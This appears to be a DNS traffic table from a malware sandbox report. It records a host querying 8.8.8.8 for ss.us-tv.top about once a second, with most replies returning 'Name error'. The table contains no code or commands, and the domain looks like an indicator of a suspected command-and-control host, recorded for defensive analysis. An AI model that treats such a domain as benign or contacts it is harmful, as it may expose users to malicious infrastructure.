Nov 2, 2024 03:57:41.203780890 CET	192.168.2.23	8.8.8.8	0xf0f6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:41.204123020 CET	192.168.2.23	8.8.8.8	0xaa11	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:42.336488008 CET	192.168.2.23	8.8.8.8	0x5bf1	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:42.336704969 CET	192.168.2.23	8.8.8.8	0xdb6	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:43.476406097 CET	192.168.2.23	8.8.8.8	0x8818	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:43.476766109 CET	192.168.2.23	8.8.8.8	0x8080	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:44.608891964 CET	192.168.2.23	8.8.8.8	0x440b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:44.608925104 CET	192.168.2.23	8.8.8.8	0xc2d9	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:45.739310026 CET	192.168.2.23	8.8.8.8	0x79b0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:45.740014076 CET	192.168.2.23	8.8.8.8	0x28d5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:46.872975111 CET	192.168.2.23	8.8.8.8	0x821d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:46.873446941 CET	192.168.2.23	8.8.8.8	0xc402	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:48.005405903 CET	192.168.2.23	8.8.8.8	0x64a7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:48.005749941 CET	192.168.2.23	8.8.8.8	0x11c5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:49.178195000 CET	192.168.2.23	8.8.8.8	0xf271	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:49.179927111 CET	192.168.2.23	8.8.8.8	0x55fe	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:50.313019991 CET	192.168.2.23	8.8.8.8	0x3389	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:50.313484907 CET	192.168.2.23	8.8.8.8	0x9544	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:51.447441101 CET	192.168.2.23	8.8.8.8	0x88f3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:51.448535919 CET	192.168.2.23	8.8.8.8	0xd51a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:52.582350969 CET	192.168.2.23	8.8.8.8	0x72ee	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:52.582736015 CET	192.168.2.23	8.8.8.8	0x6e10	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:53.714848995 CET	192.168.2.23	8.8.8.8	0x3a74	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:53.715341091 CET	192.168.2.23	8.8.8.8	0x85fe	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:54.847924948 CET	192.168.2.23	8.8.8.8	0xac88	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:54.848346949 CET	192.168.2.23	8.8.8.8	0xbba3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:55.978302002 CET	192.168.2.23	8.8.8.8	0x3ba1	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:55.978504896 CET	192.168.2.23	8.8.8.8	0x1f1b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:57.108149052 CET	192.168.2.23	8.8.8.8	0x673c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:57.108403921 CET	192.168.2.23	8.8.8.8	0x5561	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:58.238610983 CET	192.168.2.23	8.8.8.8	0x274	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:58.238795042 CET	192.168.2.23	8.8.8.8	0x445d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:59.370474100 CET	192.168.2.23	8.8.8.8	0x9f5c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:59.370718002 CET	192.168.2.23	8.8.8.8	0x19c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:00.500099897 CET	192.168.2.23	8.8.8.8	0x69aa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:00.500475883 CET	192.168.2.23	8.8.8.8	0x674	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:01.630590916 CET	192.168.2.23	8.8.8.8	0xa094	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:01.632353067 CET	192.168.2.23	8.8.8.8	0x6b25	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:03.227480888 CET	192.168.2.23	8.8.8.8	0x75ac	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:03.227590084 CET	192.168.2.23	8.8.8.8	0xa91d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:04.366494894 CET	192.168.2.23	8.8.8.8	0xa706	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:04.366548061 CET	192.168.2.23	8.8.8.8	0x726f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:05.988063097 CET	192.168.2.23	8.8.8.8	0xb55	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:05.988179922 CET	192.168.2.23	8.8.8.8	0xbd55	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:07.123496056 CET	192.168.2.23	8.8.8.8	0xdf22	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:07.123497009 CET	192.168.2.23	8.8.8.8	0xdc21	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:08.256674051 CET	192.168.2.23	8.8.8.8	0xe2ab	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:08.256725073 CET	192.168.2.23	8.8.8.8	0x7a4d	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:09.390619993 CET	192.168.2.23	8.8.8.8	0xe4bf	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:09.390863895 CET	192.168.2.23	8.8.8.8	0x1848	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:10.525909901 CET	192.168.2.23	8.8.8.8	0x2717	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:10.526153088 CET	192.168.2.23	8.8.8.8	0x71d6	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:11.661650896 CET	192.168.2.23	8.8.8.8	0x2b8	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:11.663114071 CET	192.168.2.23	8.8.8.8	0x8ecb	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:12.798181057 CET	192.168.2.23	8.8.8.8	0xd99e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:12.799035072 CET	192.168.2.23	8.8.8.8	0xa847	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:13.932859898 CET	192.168.2.23	8.8.8.8	0xfa2f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:13.933038950 CET	192.168.2.23	8.8.8.8	0xafad	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:15.068079948 CET	192.168.2.23	8.8.8.8	0xe16a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:15.068319082 CET	192.168.2.23	8.8.8.8	0x6053	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:16.204766035 CET	192.168.2.23	8.8.8.8	0xfa1c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:16.205183029 CET	192.168.2.23	8.8.8.8	0xeac7	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:17.339605093 CET	192.168.2.23	8.8.8.8	0x82e2	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:17.339936972 CET	192.168.2.23	8.8.8.8	0x7499	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:18.480119944 CET	192.168.2.23	8.8.8.8	0xcf39	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:18.480370998 CET	192.168.2.23	8.8.8.8	0x3e1b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:19.615665913 CET	192.168.2.23	8.8.8.8	0x8ece	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:19.616040945 CET	192.168.2.23	8.8.8.8	0x63ea	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:20.750715971 CET	192.168.2.23	8.8.8.8	0x114d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:20.750916958 CET	192.168.2.23	8.8.8.8	0x9369	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:21.885951042 CET	192.168.2.23	8.8.8.8	0xbf05	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:21.886193991 CET	192.168.2.23	8.8.8.8	0xecdf	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:23.022428989 CET	192.168.2.23	8.8.8.8	0xfd6a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:23.023111105 CET	192.168.2.23	8.8.8.8	0x2575	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:24.159543991 CET	192.168.2.23	8.8.8.8	0x7c0f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:24.159596920 CET	192.168.2.23	8.8.8.8	0x9681	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:25.296317101 CET	192.168.2.23	8.8.8.8	0x4fa	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:25.296801090 CET	192.168.2.23	8.8.8.8	0x3c15	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:26.431963921 CET	192.168.2.23	8.8.8.8	0x2391	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:26.432728052 CET	192.168.2.23	8.8.8.8	0x1ae5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:27.565917969 CET	192.168.2.23	8.8.8.8	0xca94	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:27.566139936 CET	192.168.2.23	8.8.8.8	0x6f52	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:28.699115992 CET	192.168.2.23	8.8.8.8	0x2069	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:28.699351072 CET	192.168.2.23	8.8.8.8	0x341f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:29.835902929 CET	192.168.2.23	8.8.8.8	0x8c80	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:29.836308956 CET	192.168.2.23	8.8.8.8	0x90cd	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:30.971605062 CET	192.168.2.23	8.8.8.8	0x44e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:30.972700119 CET	192.168.2.23	8.8.8.8	0x915e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:32.105321884 CET	192.168.2.23	8.8.8.8	0x9924	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:32.105545044 CET	192.168.2.23	8.8.8.8	0xe452	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:33.326811075 CET	192.168.2.23	8.8.8.8	0x9fcf	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:33.327018023 CET	192.168.2.23	8.8.8.8	0x3316	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:34.460148096 CET	192.168.2.23	8.8.8.8	0xf170	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:34.460366964 CET	192.168.2.23	8.8.8.8	0xe43a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:35.935776949 CET	192.168.2.23	8.8.8.8	0x9035	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:35.936037064 CET	192.168.2.23	8.8.8.8	0x3bc8	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:37.068933964 CET	192.168.2.23	8.8.8.8	0x1642	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:37.069173098 CET	192.168.2.23	8.8.8.8	0x89f5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:38.202646971 CET	192.168.2.23	8.8.8.8	0xfdf1	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:38.202944994 CET	192.168.2.23	8.8.8.8	0xf843	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:39.338419914 CET	192.168.2.23	8.8.8.8	0x61da	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:39.338644981 CET	192.168.2.23	8.8.8.8	0x3d49	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:40.477942944 CET	192.168.2.23	8.8.8.8	0x3b53	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:40.478199005 CET	192.168.2.23	8.8.8.8	0x6079	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:41.619148970 CET	192.168.2.23	8.8.8.8	0xb608	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:41.619195938 CET	192.168.2.23	8.8.8.8	0x7468	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:43.244568110 CET	192.168.2.23	8.8.8.8	0x9275	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:43.244647980 CET	192.168.2.23	8.8.8.8	0x5ca3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:44.379064083 CET	192.168.2.23	8.8.8.8	0xb646	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:44.379064083 CET	192.168.2.23	8.8.8.8	0xbc81	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:45.515105009 CET	192.168.2.23	8.8.8.8	0xa3b4	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:58:45.515619040 CET	192.168.2.23	8.8.8.8	0xc174	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 2, 2024 03:56:51.466974974 CET	8.8.8.8	192.168.2.23	0xa193	No error (0)	www.google.com		142.251.116.105	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:51.466974974 CET	8.8.8.8	192.168.2.23	0xa193	No error (0)	www.google.com		142.251.116.104	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:51.466974974 CET	8.8.8.8	192.168.2.23	0xa193	No error (0)	www.google.com		142.251.116.103	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:51.466974974 CET	8.8.8.8	192.168.2.23	0xa193	No error (0)	www.google.com		142.251.116.147	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:51.466974974 CET	8.8.8.8	192.168.2.23	0xa193	No error (0)	www.google.com		142.251.116.106	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:51.466974974 CET	8.8.8.8	192.168.2.23	0xa193	No error (0)	www.google.com		142.251.116.99	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:51.605514050 CET	8.8.8.8	192.168.2.23	0x74dd	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:56:51.606592894 CET	8.8.8.8	192.168.2.23	0x2009	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:52.743417978 CET	8.8.8.8	192.168.2.23	0x5e95	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:56:52.743428946 CET	8.8.8.8	192.168.2.23	0xb7fa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:53.879376888 CET	8.8.8.8	192.168.2.23	0xaa8	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:55.015186071 CET	8.8.8.8	192.168.2.23	0x21ab	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:56:56.353785038 CET	8.8.8.8	192.168.2.23	0xd9e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:56.354254961 CET	8.8.8.8	192.168.2.23	0x5a0d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:56:57.490953922 CET	8.8.8.8	192.168.2.23	0xca54	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:56:57.490967035 CET	8.8.8.8	192.168.2.23	0x9944	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:58.627209902 CET	8.8.8.8	192.168.2.23	0xdffa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:58.627240896 CET	8.8.8.8	192.168.2.23	0xc300	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:56:59.762600899 CET	8.8.8.8	192.168.2.23	0xcc3b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:56:59.762617111 CET	8.8.8.8	192.168.2.23	0x3a7d	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:00.898201942 CET	8.8.8.8	192.168.2.23	0xa1f6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:02.035212040 CET	8.8.8.8	192.168.2.23	0x3bb5	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:02.035979986 CET	8.8.8.8	192.168.2.23	0x49e4	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:03.172214031 CET	8.8.8.8	192.168.2.23	0x21f6	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:03.172225952 CET	8.8.8.8	192.168.2.23	0xcfb2	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:04.309899092 CET	8.8.8.8	192.168.2.23	0x41d1	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:05.445926905 CET	8.8.8.8	192.168.2.23	0x31e8	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:05.446199894 CET	8.8.8.8	192.168.2.23	0xe5a1	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:06.591854095 CET	8.8.8.8	192.168.2.23	0x9c2f	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:06.591871023 CET	8.8.8.8	192.168.2.23	0x5d8b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:07.729707003 CET	8.8.8.8	192.168.2.23	0x426c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:07.730097055 CET	8.8.8.8	192.168.2.23	0xe57b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:08.869858980 CET	8.8.8.8	192.168.2.23	0x9245	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:10.006472111 CET	8.8.8.8	192.168.2.23	0x2253	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:10.006547928 CET	8.8.8.8	192.168.2.23	0x4b5f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:11.331187010 CET	8.8.8.8	192.168.2.23	0x29ef	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:11.331196070 CET	8.8.8.8	192.168.2.23	0xa1e4	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:11.331206083 CET	8.8.8.8	192.168.2.23	0xa1e4	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:12.466730118 CET	8.8.8.8	192.168.2.23	0x968a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:12.467066050 CET	8.8.8.8	192.168.2.23	0x7dd8	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:13.606221914 CET	8.8.8.8	192.168.2.23	0x8344	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:13.606543064 CET	8.8.8.8	192.168.2.23	0x5d19	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:14.742590904 CET	8.8.8.8	192.168.2.23	0xbc9f	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:14.742671967 CET	8.8.8.8	192.168.2.23	0x8c33	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:15.879020929 CET	8.8.8.8	192.168.2.23	0x5298	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:15.879108906 CET	8.8.8.8	192.168.2.23	0x2aa9	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:17.019388914 CET	8.8.8.8	192.168.2.23	0xac12	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:17.019407034 CET	8.8.8.8	192.168.2.23	0x70cf	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:18.158709049 CET	8.8.8.8	192.168.2.23	0x7cb9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:18.158721924 CET	8.8.8.8	192.168.2.23	0x2c4b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:19.296253920 CET	8.8.8.8	192.168.2.23	0x63e6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:20.432281971 CET	8.8.8.8	192.168.2.23	0xe31a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:20.432367086 CET	8.8.8.8	192.168.2.23	0xe4e2	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:21.570107937 CET	8.8.8.8	192.168.2.23	0x7ff9	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:22.707669973 CET	8.8.8.8	192.168.2.23	0x77b7	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:22.707712889 CET	8.8.8.8	192.168.2.23	0xe1e8	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:23.844480991 CET	8.8.8.8	192.168.2.23	0x3e02	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:23.845989943 CET	8.8.8.8	192.168.2.23	0x2d57	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:24.983661890 CET	8.8.8.8	192.168.2.23	0x203b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:24.983715057 CET	8.8.8.8	192.168.2.23	0xe5ab	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:26.124747038 CET	8.8.8.8	192.168.2.23	0xaa97	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:26.125277996 CET	8.8.8.8	192.168.2.23	0x6fcb	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:27.731358051 CET	8.8.8.8	192.168.2.23	0x4d33	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:27.731889963 CET	8.8.8.8	192.168.2.23	0x2451	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:28.864679098 CET	8.8.8.8	192.168.2.23	0xa4fe	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:30.000118017 CET	8.8.8.8	192.168.2.23	0xf024	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:30.000205040 CET	8.8.8.8	192.168.2.23	0xf101	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:31.134973049 CET	8.8.8.8	192.168.2.23	0xdc87	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:32.269361973 CET	8.8.8.8	192.168.2.23	0xeba8	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:32.269689083 CET	8.8.8.8	192.168.2.23	0xfb8a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:33.404954910 CET	8.8.8.8	192.168.2.23	0x934d	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:34.538054943 CET	8.8.8.8	192.168.2.23	0x96e5	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:34.538803101 CET	8.8.8.8	192.168.2.23	0xcaf0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:35.669122934 CET	8.8.8.8	192.168.2.23	0x56fb	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:35.669133902 CET	8.8.8.8	192.168.2.23	0x568d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
